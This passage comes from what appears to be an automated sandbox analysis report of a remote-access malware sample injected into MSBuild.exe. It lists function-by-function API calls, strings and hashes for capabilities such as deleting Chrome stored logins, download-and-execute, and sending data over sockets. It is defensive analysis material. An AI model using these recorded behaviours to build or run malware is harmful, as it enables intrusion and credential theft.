                                                                                                                        • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                        • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                        Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2341273852-0
                                                                                                                        • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                        • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                        • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                        • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                        Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                                                        • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                        • API String ID: 341183262-3780268858
                                                                                                                        • Opcode ID: 4a20c0569278ccd7b83803a3119eee7939bbd42666476940d9819e04addf5ade
                                                                                                                        • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                        • Opcode Fuzzy Hash: 4a20c0569278ccd7b83803a3119eee7939bbd42666476940d9819e04addf5ade
                                                                                                                        • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                        Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                        • API String ID: 2127411465-314212984
                                                                                                                        • Opcode ID: 9b649a5ca88d0385f6cefe5a0b4b331d19e1d88f45010ac01100a11bd9e3d31b
                                                                                                                        • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                        • Opcode Fuzzy Hash: 9b649a5ca88d0385f6cefe5a0b4b331d19e1d88f45010ac01100a11bd9e3d31b
                                                                                                                        • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                        Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                        • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                        Strings
                                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                        • UserProfile, xrefs: 0040B227
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                                        • Opcode ID: 6271698307c79f353f6ee14750273fab332a6b3e3f46d995ad72bb9cc5e0b911
                                                                                                                        • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                        • Opcode Fuzzy Hash: 6271698307c79f353f6ee14750273fab332a6b3e3f46d995ad72bb9cc5e0b911
                                                                                                                        • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                        Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                        • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                        Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                        • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                                                        • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                        • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                                                        Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4043647387-0
                                                                                                                        • Opcode ID: 072babcdb994f4f7b1fdb58d7b56cdcbec8b8e1b5d30c53e861db63579fffaa3
                                                                                                                        • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                        • Opcode Fuzzy Hash: 072babcdb994f4f7b1fdb58d7b56cdcbec8b8e1b5d30c53e861db63579fffaa3
                                                                                                                        • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                        Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 276877138-0
                                                                                                                        • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                        • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                        • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                        • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                        Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                                        • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                        • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                        • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                        Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                        • String ID: SETTINGS
                                                                                                                        • API String ID: 3473537107-594951305
                                                                                                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                        • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                        • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                        Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157919129-0
                                                                                                                        • Opcode ID: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
                                                                                                                        • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                        • Opcode Fuzzy Hash: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
                                                                                                                        • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                        Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                        • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                        • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                                        Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DownloadExecuteFileShell
                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                                                                                        • API String ID: 2825088817-2582742282
                                                                                                                        • Opcode ID: 1f4e035516294d1c63e64c8052a33b962d446aa93914cefb710f3af829e08434
                                                                                                                        • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                        • Opcode Fuzzy Hash: 1f4e035516294d1c63e64c8052a33b962d446aa93914cefb710f3af829e08434
                                                                                                                        • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                        Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$FirstNextsend
                                                                                                                        • String ID: x@G$x@G
                                                                                                                        • API String ID: 4113138495-3390264752
                                                                                                                        • Opcode ID: 19bc1d597298d40ad5cd834a7765643e1cdc608ef6365144587b8eec9382b911
                                                                                                                        • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                        • Opcode Fuzzy Hash: 19bc1d597298d40ad5cd834a7765643e1cdc608ef6365144587b8eec9382b911
                                                                                                                        • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                        Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                          • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                          • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                        • API String ID: 4127273184-3576401099
                                                                                                                        • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                        • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                        • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                        • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                        Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4212172061-0
                                                                                                                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                        • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                        • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                        Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
